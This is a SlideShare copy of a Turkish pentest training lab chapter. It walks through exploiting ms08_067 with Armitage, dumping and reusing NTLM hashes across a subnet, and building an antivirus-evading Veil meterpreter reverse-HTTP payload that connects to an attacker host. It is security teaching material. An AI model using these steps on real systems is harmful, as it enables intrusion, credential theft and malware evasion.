SlideShare a Scribd company logo
[PENTEST LAB ÇALIŞMALARI]
BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity
PENTEST EĞİTİMİ
UYGULAMA KİTABI
BÖLÜM - 10
[PENTEST LAB ÇALIŞMALARI]
BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity
İÇİNDEKİLER
10. EXPLOIT POST EXPLOITATION
BU KATEGORİDEKİ LAB UYGULAMA LİSTESİ
10.1. Armitage Kullanarak Sızma Testi
10.2. Armitage Zafiyet İstismarı Sonrası Networkte İlerlenmesi
10.3. Antivirüs Atlatma
[PENTEST LAB ÇALIŞMALARI]
BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity
10.1. Armitage Kullanarak Sızma Testi
Amaç: armitage aracılığı ile sistemlere sızma testi girişimlerinin gerçekleştirilmesi.
Kullanılan Araçlar: armitage
Uygulama: armitage aracılığı, güvenlik güncelleştirmeleri eksik bir sisteme sızma
girişimleri gerçekleştirilecektir.
Not: Armitage programı metasploit programının görsel halidir. Araç hakkında detaylı bir
bilgiye aşağıda verilen linkten erişilebilinir.
http://www.slideshare.net/bgasecurity/szma-testlerinde-armitage-kullanm
1. Aynı ağda bulunan sistemleri tespit edilmesi;
Resimde gösterildiği üzere Hosts -> Quick Scan (OS detect) seçenekleri tıklanır.
Ekrana gelen diyalog kutusunda taranmak istenen network girilir
Tarama sonrası elde edilen görüntü;
[PENTEST LAB ÇALIŞMALARI]
BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity
Bu aşamadan sonra çalışma alanına düşen hedeflere yönelik kullanılabilecek saldırı
yöntemleri denenebilir.
Sırada hedef sistemlere sağ tıklayıp olası saldırı çeşitlerini görüntülemek kalmaktadır.
[PENTEST LAB ÇALIŞMALARI]
BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity
Ekran alıntısında gösterildiği üzere hedef sistemde ms08_067 _netapi zafiyeti
bulunmaktadır. Seçili alan tıklandığında bu saldırı hedef sistem için gerçekleştiricektir.
Saldırının diyalog penceresinden gerekli düzenlemeler yapılabilir;
Saldırı başlatıldığında çalışma alanında elde edilecek görüntü;
[PENTEST LAB ÇALIŞMALARI]
BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity
Kırmızı çerçeve içerisine alınan hedefin ele geçirildiği görülmektedir.
Hedef sistemde bulunan kullanıcı parola bilgilerinin alınması;
Ekran alıntısında gösterilen alanlar seçilerek ilerlenir.
Ele geçirilen parola hashleri;
Sızılan sistemlerde daha neler yapılabileceği hakkında yukarıda verilen doküman
linkinden faydalanabilirsiniz.
[PENTEST LAB ÇALIŞMALARI]
BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity
10.2. Armitage Zafiyet İstismarıSonrasıNetworkteİlerlenmesi
Amaç: armitage aracının kullanımı ile sızılan sistemden yola çıkarak network üzerinde
ilerlenmeye çalışılması
Kullanılan Araçlar: armitage
Uygulama: Bir önceki uygulamada elde edilen kullanıcı hash biligileri aynı networkte
denenmeye çalışılacaktır;
Parola hashleri;
Administrator:500:ccf9155e3e7db453aad3b435b51404ee:3dbde697d71690a769204be
b12283678
ASPNET:1003:5225995e8cc849b60c792b07881f9a0f:4d8a7033e90f8f598f3094202ccb
7d2e
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c08
9c0
HelpAssistant:1000:3b74ac75ea4f51e974117d499cf78088:a4ced45433474f258bbcb4f7
a9753077
Bu parola özetlerinden Administrator hesabı tüm 1.1.1.0/24 networkü için denenecektir.
Bunun için smb_login modülü aranır, çağrılır ve değerler girilir.
[PENTEST LAB ÇALIŞMALARI]
BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity
Başarılı giriş denemeleri aşağıda ekran alıntısı şeklinde verilmiştir.
Bu bilgiller dahilinde sistemin paylaşımlarına erişilebilir ve komut satırına erişim
sysinternal psexec aracı ile gerçekleştirilebilir.
[PENTEST LAB ÇALIŞMALARI]
BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity
10.3. Antivirüs Atlatma
Amaç: Zararlı yazılımların encoding yöntemi ile antivirüslerden atlatılması
Kullanılan Araçlar: veil-evasion master, armitage
Uygulama: Hedef sistemlerde saldırıların başarısızlıkla sonuçlanmasına sebep olan
önlemlerden bir tanesi de antivirüs kullanımıdır. Antivirüsler imza tabanlı olarak
çalışmaktadır, tanımadığı bir yazılımı ve davranışını tanımlayamadığı bir yazılımı tehdit
olarak algılamayacaktır.
1. Adım Encoding edilmiş zararlı yazılımın oluşturulması
Bu iş için veil-frame work kullanılacaktır;
Veil dizinine gidilerek program çalıştırılır;
root@kali:~/Veil-Evasion-master# ./Veil-Evasion.py
Elde edilmesi beklenen ekran;
List komutu ile tüm olası payload çeşitleri listelenir;
[>] Please enter a command: list
Bu aşamada birçok zaralı yöntemi seçilebilmektedir.
Burada 3. sırada bulunan ve c dilinde yazılmış ve saldırganın makinesine http ile
bağlantı isteği gönderecek olan bir payload seçilecektir.
[>] Please enter a command: 3
==================================================================
=======
[PENTEST LAB ÇALIŞMALARI]
BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity
Veil-Evasion | [Version]: 2.16.0
==================================================================
=======
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
==================================================================
=======
Payload: c/meterpreter/rev_http loaded
Bu aşamadan sonra saldırganın ip adresi ve port numarası girilip zararlı yazılımın bu
standartlarda üretilmesi sağlanmalıdır.
Girilmesi gereken komutlar:
set LHOST 192.168.1.41
set LPORT 4445
generate
İlgili değişikliklerin gerçekleştirildiği alanlar ve sonuçları:
Required Options:
Name Current Value Description
---- ------------- -----------
LHOST IP of the metasploit handler
LPORT 8080 Port of the metasploit handler
compile_to_exe Y Compile to an executable
Available commands:
set set a specific option value
info show information about the payload
generate generate payload
back go to the main menu
exit exit Veil
[>] Please enter a command: set LHOST 192.168.1.41
[>] Please enter a command: set LPORT 4445
[>] Please enter a command: generate
==================================================================
=======
[PENTEST LAB ÇALIŞMALARI]
BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity
Veil-Evasion | [Version]: 2.16.0
==================================================================
=======
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
==================================================================
=======
[*] Press [enter] for 'payload'
[>] Please enter the base name for output files: testme
==================================================================
=======
Veil-Evasion | [Version]: 2.16.0
==================================================================
=======
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
==================================================================
=======
[*] Executable written to: /usr/share/veil-output/compiled/testme.exe
Language: c
Payload: c/meterpreter/rev_http
Required Options: LHOST=192.168.1.41 LPORT=4445 compile_to_exe=Y
Payload File: /usr/share/veil-output/source/testme.c
Handler File: /usr/share/veil-output/handlers/testme_handler.rc
[*] Your payload files have been generated, don't get caught!
[!] And don't submit samples to any online scanner! ;)
Zararlı yazılımın oluşturulan dizini: /usr/share/veil-output/compiled/testme.exe
Zararlı yazılımın kurban sistemlere bulaştırılması için çeşitli yöntemler kullanılabilir. Bu
yöntemlerden derslerde bahsedilmektedir.
[PENTEST LAB ÇALIŞMALARI]
BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity
Hedef sisteme bulaştırılan yazılımın, veritabanı güncel olan bir antivirüs ile taranma
sonucu;
Görüldüğü gibi zararlı yazılım olduğu tespit edilmemiştir.
Hâlbuki zararlı yazılım çalıştırıldığında saldırganın makinesine bağlantı oluşturulmakta
ve sistem saldırganın eline geçmiş olmaktadır.
Not: Bu doküman BGA Bilgi Güvenliği A.Ş için Mesut Türk tarafından hazırlanmıştır.

More Related Content

DOCX
Hacking'in Mavi Tarafı -1
PPTX
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6
DOCX
LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ
PDF
Beyaz Şapkalı Hacker (CEH) Lab Kitabı
PPTX
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 1
PDF
Metasploit El Kitabı
PPTX
Log Yönetimi ve Saldırı Analizi Eğitimi - 2
PPTX
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 2
Hacking'in Mavi Tarafı -1
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6
LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ
Beyaz Şapkalı Hacker (CEH) Lab Kitabı
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 1
Metasploit El Kitabı
Log Yönetimi ve Saldırı Analizi Eğitimi - 2
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 2

What's hot (20)

PDF
Metasploit Framework Eğitimi
PDF
Bilgi Güvenliğinde Sızma Testleri
PPTX
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3
DOCX
GÜVENLİK SİSTEMLERİNİ ATLATMA
PPTX
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 7, 8, 9
PDF
Kali ile Linux'e Giriş | IntelRAD
PDF
Hping Kullanarak Ağ Keşif Çalışmaları
DOCX
SIZMA TESTLERİNDE BİLGİ TOPLAMA
PPTX
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 19
PDF
Siber Güvenlik Kış Kampı'18 Soruları
PDF
BackTrack Linux-101 Eğitimi
PDF
Yazılım Güvenliği Temelleri
PPTX
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 3
PDF
Güvenli Veri Silme ve Dosya Kurtarma
PDF
Kurumsal Ağlarda Log İnceleme Yöntemiyle Saldırı Analizi
DOCX
INTERNET VE YEREL AĞ SIZMA TESTLERİ
PDF
Holynix v1
PDF
Arp protokolu ve guvenlik zafiyeti
PDF
Uygulamalı Ağ Güvenliği Eğitimi Lab Çalışmaları
Metasploit Framework Eğitimi
Bilgi Güvenliğinde Sızma Testleri
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3
GÜVENLİK SİSTEMLERİNİ ATLATMA
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 7, 8, 9
Kali ile Linux'e Giriş | IntelRAD
Hping Kullanarak Ağ Keşif Çalışmaları
SIZMA TESTLERİNDE BİLGİ TOPLAMA
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 19
Siber Güvenlik Kış Kampı'18 Soruları
BackTrack Linux-101 Eğitimi
Yazılım Güvenliği Temelleri
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 3
Güvenli Veri Silme ve Dosya Kurtarma
Kurumsal Ağlarda Log İnceleme Yöntemiyle Saldırı Analizi
INTERNET VE YEREL AĞ SIZMA TESTLERİ
Holynix v1
Arp protokolu ve guvenlik zafiyeti
Uygulamalı Ağ Güvenliği Eğitimi Lab Çalışmaları
Ad

Viewers also liked (18)

PDF
Gurultu turleri yersel_filtreler
PPTX
Open cv kütüphanesi
PPTX
Hadoop,Pig,Hive ve Oozie ile Büyük Veri Analizi
PDF
HTTPS Ne Kadar Güvenlidir?(sslstrip)
PPT
Yapay Zeka
PDF
TCP/IP Ağlarda İleri Seviye Paket Analizi – Tshark
PPTX
Python mu Java mı?
ODT
10-Kablosuz Ağlardaki Zaafiyetler
ODP
Büyük veri(bigdata)
ODP
Özgür Yazılımlarla Görüntü İşleme
PDF
Büyük Veri ve Risk Yönetimi
ODP
Python Programlama Dili Eğitimi
PPTX
AI - Tekil 12 GSÜ
PDF
BGA CTF Ethical Hacking Yarışması Çözümleri
PDF
Görüntü işleme
PPTX
Pasif Bilgi Toplama
PDF
Man in the Middle Atack (Ortadaki Adam Saldırısı)
PDF
Tcpdump ile Trafik Analizi(Sniffing)
Gurultu turleri yersel_filtreler
Open cv kütüphanesi
Hadoop,Pig,Hive ve Oozie ile Büyük Veri Analizi
HTTPS Ne Kadar Güvenlidir?(sslstrip)
Yapay Zeka
TCP/IP Ağlarda İleri Seviye Paket Analizi – Tshark
Python mu Java mı?
10-Kablosuz Ağlardaki Zaafiyetler
Büyük veri(bigdata)
Özgür Yazılımlarla Görüntü İşleme
Büyük Veri ve Risk Yönetimi
Python Programlama Dili Eğitimi
AI - Tekil 12 GSÜ
BGA CTF Ethical Hacking Yarışması Çözümleri
Görüntü işleme
Pasif Bilgi Toplama
Man in the Middle Atack (Ortadaki Adam Saldırısı)
Tcpdump ile Trafik Analizi(Sniffing)
Ad

Similar to EXPLOIT POST EXPLOITATION (20)

PDF
Sızma Testlerinde Armitage Kullanımı
DOCX
WEB ve MOBİL SIZMA TESTLERİ
PDF
Zafiyet tespiti ve sizma yöntemleri
PDF
Siber Guvenlik ve Etik Hhacking -2-
PDF
Beyaz Şapkalı Hacker CEH Eğitimi - Exploit Aşaması
PDF
Siber Güvenlik ve Etik Hacking Sunu - 10
PDF
Metasploit Framework - Giris Seviyesi Guvenlik Denetim Rehberi
PPTX
Bilge adam beşiktaş şube ethical hacking ve sızma yöntemleri etkinliği
PDF
10 Adımda Sızma Testleri
ODP
Bilgi Sistemleri Güvenliği Metasploit
PDF
Güvenlik Testlerinde Açık Kaynak İstihbaratı Kullanımı
PDF
Penetrasyon Testlerinde Açık Kod Yazılımların Kullanımı
PDF
Beyaz Şapkalı Hacker CEH Eğitimi - Post Exploit Aşaması
PPTX
BTRisk - Siber Olay Tespit ve Mudahale Egitimi
PDF
Windows Hacking 2
PDF
Metasploit Framework ile Güvenlik Denetimi
PPTX
Hacking Uygulamaları ve Araçları
PDF
Sızma Testi ve Güvenlik Denetlemeleri - Giriş
PPT
2010 Kocaeli Linux Günleri - Linux Güvenlik UygulamalarıLinux
PPTX
BTRisk Zararlı Yazılım Analizi Eğitimi Sunumu - Bölüm 1
Sızma Testlerinde Armitage Kullanımı
WEB ve MOBİL SIZMA TESTLERİ
Zafiyet tespiti ve sizma yöntemleri
Siber Guvenlik ve Etik Hhacking -2-
Beyaz Şapkalı Hacker CEH Eğitimi - Exploit Aşaması
Siber Güvenlik ve Etik Hacking Sunu - 10
Metasploit Framework - Giris Seviyesi Guvenlik Denetim Rehberi
Bilge adam beşiktaş şube ethical hacking ve sızma yöntemleri etkinliği
10 Adımda Sızma Testleri
Bilgi Sistemleri Güvenliği Metasploit
Güvenlik Testlerinde Açık Kaynak İstihbaratı Kullanımı
Penetrasyon Testlerinde Açık Kod Yazılımların Kullanımı
Beyaz Şapkalı Hacker CEH Eğitimi - Post Exploit Aşaması
BTRisk - Siber Olay Tespit ve Mudahale Egitimi
Windows Hacking 2
Metasploit Framework ile Güvenlik Denetimi
Hacking Uygulamaları ve Araçları
Sızma Testi ve Güvenlik Denetlemeleri - Giriş
2010 Kocaeli Linux Günleri - Linux Güvenlik UygulamalarıLinux
BTRisk Zararlı Yazılım Analizi Eğitimi Sunumu - Bölüm 1

More from BGA Cyber Security (20)

PDF
WEBSOCKET Protokolünün Derinlemesine İncelenmesi
PDF
Tatil Öncesi Güvenlik Kontrol Listesi.pdf
PDF
Ücretsiz Bilgi Güvenliği Farkındalık Eğitimi
PDF
3. parti firma risklerinden nasıl korunulur?
PDF
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
PDF
Webinar: Popüler black marketler
PDF
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
PDF
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
PDF
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
PDF
Webinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
PDF
Open Source Soc Araçları Eğitimi 2020-II
PDF
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
PDF
Hacklenmiş Windows Sistem Analizi
PDF
Open Source SOC Kurulumu
PDF
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
PDF
Siber Fidye 2020 Raporu
PDF
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
PDF
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
PDF
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
PDF
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi Toplama
WEBSOCKET Protokolünün Derinlemesine İncelenmesi
Tatil Öncesi Güvenlik Kontrol Listesi.pdf
Ücretsiz Bilgi Güvenliği Farkındalık Eğitimi
3. parti firma risklerinden nasıl korunulur?
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Webinar: Popüler black marketler
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
Webinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Open Source Soc Araçları Eğitimi 2020-II
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
Hacklenmiş Windows Sistem Analizi
Open Source SOC Kurulumu
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
Siber Fidye 2020 Raporu
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi Toplama

EXPLOIT POST EXPLOITATION

  • 1. [PENTEST LAB ÇALIŞMALARI] BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity PENTEST EĞİTİMİ UYGULAMA KİTABI BÖLÜM - 10
  • 2. [PENTEST LAB ÇALIŞMALARI] BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity İÇİNDEKİLER 10. EXPLOIT POST EXPLOITATION BU KATEGORİDEKİ LAB UYGULAMA LİSTESİ 10.1. Armitage Kullanarak Sızma Testi 10.2. Armitage Zafiyet İstismarı Sonrası Networkte İlerlenmesi 10.3. Antivirüs Atlatma
  • 3. [PENTEST LAB ÇALIŞMALARI] BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity 10.1. Armitage Kullanarak Sızma Testi Amaç: armitage aracılığı ile sistemlere sızma testi girişimlerinin gerçekleştirilmesi. Kullanılan Araçlar: armitage Uygulama: armitage aracılığı, güvenlik güncelleştirmeleri eksik bir sisteme sızma girişimleri gerçekleştirilecektir. Not: Armitage programı metasploit programının görsel halidir. Araç hakkında detaylı bir bilgiye aşağıda verilen linkten erişilebilinir. http://www.slideshare.net/bgasecurity/szma-testlerinde-armitage-kullanm 1. Aynı ağda bulunan sistemleri tespit edilmesi; Resimde gösterildiği üzere Hosts -> Quick Scan (OS detect) seçenekleri tıklanır. Ekrana gelen diyalog kutusunda taranmak istenen network girilir Tarama sonrası elde edilen görüntü;
  • 4. [PENTEST LAB ÇALIŞMALARI] BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity Bu aşamadan sonra çalışma alanına düşen hedeflere yönelik kullanılabilecek saldırı yöntemleri denenebilir. Sırada hedef sistemlere sağ tıklayıp olası saldırı çeşitlerini görüntülemek kalmaktadır.
  • 5. [PENTEST LAB ÇALIŞMALARI] BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity Ekran alıntısında gösterildiği üzere hedef sistemde ms08_067 _netapi zafiyeti bulunmaktadır. Seçili alan tıklandığında bu saldırı hedef sistem için gerçekleştiricektir. Saldırının diyalog penceresinden gerekli düzenlemeler yapılabilir; Saldırı başlatıldığında çalışma alanında elde edilecek görüntü;
  • 6. [PENTEST LAB ÇALIŞMALARI] BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity Kırmızı çerçeve içerisine alınan hedefin ele geçirildiği görülmektedir. Hedef sistemde bulunan kullanıcı parola bilgilerinin alınması; Ekran alıntısında gösterilen alanlar seçilerek ilerlenir. Ele geçirilen parola hashleri; Sızılan sistemlerde daha neler yapılabileceği hakkında yukarıda verilen doküman linkinden faydalanabilirsiniz.
  • 7. [PENTEST LAB ÇALIŞMALARI] BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity 10.2. Armitage Zafiyet İstismarıSonrasıNetworkteİlerlenmesi Amaç: armitage aracının kullanımı ile sızılan sistemden yola çıkarak network üzerinde ilerlenmeye çalışılması Kullanılan Araçlar: armitage Uygulama: Bir önceki uygulamada elde edilen kullanıcı hash biligileri aynı networkte denenmeye çalışılacaktır; Parola hashleri; Administrator:500:ccf9155e3e7db453aad3b435b51404ee:3dbde697d71690a769204be b12283678 ASPNET:1003:5225995e8cc849b60c792b07881f9a0f:4d8a7033e90f8f598f3094202ccb 7d2e Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c08 9c0 HelpAssistant:1000:3b74ac75ea4f51e974117d499cf78088:a4ced45433474f258bbcb4f7 a9753077 Bu parola özetlerinden Administrator hesabı tüm 1.1.1.0/24 networkü için denenecektir. Bunun için smb_login modülü aranır, çağrılır ve değerler girilir.
  • 8. [PENTEST LAB ÇALIŞMALARI] BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity Başarılı giriş denemeleri aşağıda ekran alıntısı şeklinde verilmiştir. Bu bilgiller dahilinde sistemin paylaşımlarına erişilebilir ve komut satırına erişim sysinternal psexec aracı ile gerçekleştirilebilir.
  • 9. [PENTEST LAB ÇALIŞMALARI] BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity 10.3. Antivirüs Atlatma Amaç: Zararlı yazılımların encoding yöntemi ile antivirüslerden atlatılması Kullanılan Araçlar: veil-evasion master, armitage Uygulama: Hedef sistemlerde saldırıların başarısızlıkla sonuçlanmasına sebep olan önlemlerden bir tanesi de antivirüs kullanımıdır. Antivirüsler imza tabanlı olarak çalışmaktadır, tanımadığı bir yazılımı ve davranışını tanımlayamadığı bir yazılımı tehdit olarak algılamayacaktır. 1. Adım Encoding edilmiş zararlı yazılımın oluşturulması Bu iş için veil-frame work kullanılacaktır; Veil dizinine gidilerek program çalıştırılır; root@kali:~/Veil-Evasion-master# ./Veil-Evasion.py Elde edilmesi beklenen ekran; List komutu ile tüm olası payload çeşitleri listelenir; [>] Please enter a command: list Bu aşamada birçok zaralı yöntemi seçilebilmektedir. Burada 3. sırada bulunan ve c dilinde yazılmış ve saldırganın makinesine http ile bağlantı isteği gönderecek olan bir payload seçilecektir. [>] Please enter a command: 3 ================================================================== =======
  • 10. [PENTEST LAB ÇALIŞMALARI] BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity Veil-Evasion | [Version]: 2.16.0 ================================================================== ======= [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ================================================================== ======= Payload: c/meterpreter/rev_http loaded Bu aşamadan sonra saldırganın ip adresi ve port numarası girilip zararlı yazılımın bu standartlarda üretilmesi sağlanmalıdır. Girilmesi gereken komutlar: set LHOST 192.168.1.41 set LPORT 4445 generate İlgili değişikliklerin gerçekleştirildiği alanlar ve sonuçları: Required Options: Name Current Value Description ---- ------------- ----------- LHOST IP of the metasploit handler LPORT 8080 Port of the metasploit handler compile_to_exe Y Compile to an executable Available commands: set set a specific option value info show information about the payload generate generate payload back go to the main menu exit exit Veil [>] Please enter a command: set LHOST 192.168.1.41 [>] Please enter a command: set LPORT 4445 [>] Please enter a command: generate ================================================================== =======
  • 11. [PENTEST LAB ÇALIŞMALARI] BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity Veil-Evasion | [Version]: 2.16.0 ================================================================== ======= [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ================================================================== ======= [*] Press [enter] for 'payload' [>] Please enter the base name for output files: testme ================================================================== ======= Veil-Evasion | [Version]: 2.16.0 ================================================================== ======= [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework ================================================================== ======= [*] Executable written to: /usr/share/veil-output/compiled/testme.exe Language: c Payload: c/meterpreter/rev_http Required Options: LHOST=192.168.1.41 LPORT=4445 compile_to_exe=Y Payload File: /usr/share/veil-output/source/testme.c Handler File: /usr/share/veil-output/handlers/testme_handler.rc [*] Your payload files have been generated, don't get caught! [!] And don't submit samples to any online scanner! ;) Zararlı yazılımın oluşturulan dizini: /usr/share/veil-output/compiled/testme.exe Zararlı yazılımın kurban sistemlere bulaştırılması için çeşitli yöntemler kullanılabilir. Bu yöntemlerden derslerde bahsedilmektedir.
  • 12. [PENTEST LAB ÇALIŞMALARI] BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity Hedef sisteme bulaştırılan yazılımın, veritabanı güncel olan bir antivirüs ile taranma sonucu; Görüldüğü gibi zararlı yazılım olduğu tespit edilmemiştir. Hâlbuki zararlı yazılım çalıştırıldığında saldırganın makinesine bağlantı oluşturulmakta ve sistem saldırganın eline geçmiş olmaktadır. Not: Bu doküman BGA Bilgi Güvenliği A.Ş için Mesut Türk tarafından hazırlanmıştır.